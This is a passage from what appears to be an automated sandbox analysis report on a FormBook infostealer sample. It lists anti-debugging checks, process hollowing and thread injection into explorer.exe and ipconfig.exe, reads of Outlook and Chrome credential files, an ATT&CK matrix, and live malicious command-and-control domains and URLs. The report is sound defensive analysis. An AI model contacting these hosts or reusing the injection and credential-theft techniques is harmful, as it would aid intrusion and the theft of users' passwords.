          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AD3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ADFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00ABFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00AF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_00A3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 3_2_0040C3E7 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AB3E SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040A9DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AE0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040F730 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.fedefarmatour.online
          Source: C:\Windows\explorer.exeDomain query: www.a8-group.com
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.143.200 80
          Source: C:\Windows\explorer.exeDomain query: www.t4yfrance.com
          Source: C:\Windows\explorer.exeDomain query: www.inhomeyoga.com
          Source: C:\Windows\explorer.exeNetwork Connect: 195.110.124.133 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 210000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\iscan.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeThread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeThread register set: target process: 3452
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeProcess created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.311230445.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.328795105.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301814210.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.257028572.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.302343786.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.329189526.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.257527042.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040AC4B cpuid
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_0040A8C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		512
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder          		2
          Obfuscated Files or Information          		21
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Masquerading          		Security Account Manager15
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Virtualization/Sandbox Evasion          		NTDS141
          Security Software Discovery          		Distributed Component Object Model21
          Input Capture          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
          Process Injection          		LSA Secrets1
          Virtualization/Sandbox Evasion          		SSH2
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Network Configuration Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 756343 Sample: PrWP76ejHO.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 59 Multi AV Scanner detection for domain / URL 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for URL or domain 2->63 65 3 other signatures 2->65 10 PrWP76ejHO.exe 19 2->10         started        process3 file4 41 C:\Users\user\AppData\Local\Temp\iscan.exe, PE32 10->41 dropped 13 iscan.exe 1 3 10->13         started        process5 file6 43 C:\Users\user\AppData\Roaming\...\iijhlev.exe, PE32 13->43 dropped 83 Multi AV Scanner detection for dropped file 13->83 85 Machine Learning detection for dropped file 13->85 87 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->87 89 Maps a DLL or memory area into another process 13->89 17 iscan.exe 13->17         started        20 conhost.exe 13->20         started        signatures7 process8 signatures9 51 Modifies the context of a thread in another process (thread injection) 17->51 53 Maps a DLL or memory area into another process 17->53 55 Sample uses process hollowing technique 17->55 57 Queues an APC in another process (thread injection) 17->57 22 explorer.exe 17->22 injected process10 dnsIp11 45 t4yfrance.com 50.87.143.200, 49715, 49716, 49717 UNIFIEDLAYER-AS-1US United States 22->45 47 inhomeyoga.com 195.110.124.133, 49710, 80 REGISTER-ASIT Italy 22->47 49 5 other IPs or domains 22->49 67 System process connects to network (likely due to code injection or exploit) 22->67 69 Uses ipconfig to lookup or modify the Windows network settings 22->69 26 ipconfig.exe 13 22->26         started        29 iijhlev.exe 1 22->29         started        31 iijhlev.exe 1 22->31         started        signatures12 process13 signatures14 71 Tries to steal Mail credentials (via file / registry access) 26->71 73 Tries to harvest and steal browser information (history, passwords, etc) 26->73 75 Modifies the context of a thread in another process (thread injection) 26->75 77 Maps a DLL or memory area into another process 26->77 79 Multi AV Scanner detection for dropped file 29->79 81 Machine Learning detection for dropped file 29->81 33 WerFault.exe 10 29->33         started        35 conhost.exe 29->35         started        37 WerFault.exe 4 10 31->37         started        39 conhost.exe 31->39         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PrWP76ejHO.exe73%ReversingLabsWin32.Trojan.FormBook
          PrWP76ejHO.exe32%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\iscan.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\iscan.exe27%ReversingLabsWin32.Trojan.FormBook
          C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe27%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.iscan.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.0.PrWP76ejHO.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          3.2.iscan.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.PrWP76ejHO.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          1.2.iscan.exe.8d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          inhomeyoga.com11%VirustotalBrowse
          t4yfrance.com9%VirustotalBrowse
          fedefarmatour.online14%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.fedefarmatour.online/dwdp/100%Avira URL Cloudmalware
          http://www.t4yfrance.com/dwdp/100%Avira URL Cloudmalware
          http://www.a8-group.com/dwdp/100%Avira URL Cloudmalware
          http://www.fedefarmatour.online/dwdp/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          inhomeyoga.com
          		195.110.124.133
          		truetrueunknown
          t4yfrance.com
          		50.87.143.200
          		truetrueunknown
          www.a8-group.com
          		194.58.112.174
          		truetrue
            		unknown
            fedefarmatour.online
            		81.88.48.71
            		truetrueunknown
            www.fedefarmatour.online
            		unknown
            		unknowntrue
              		unknown
              www.t4yfrance.com
              		unknown
              		unknowntrue
                		unknown
                www.inhomeyoga.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.fedefarmatour.online/dwdp/true
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.t4yfrance.com/dwdp/true
                  • Avira URL Cloud: malware
                  		unknown
                  www.fedefarmatour.online/dwdp/true
                  • Avira URL Cloud: malware
                  		low
                  http://www.a8-group.com/dwdp/true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=1x6VE38oK.22.drfalse
                    		high
                    https://search.yahoo.com?fr=crmas_sfpipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drfalse
                      		high
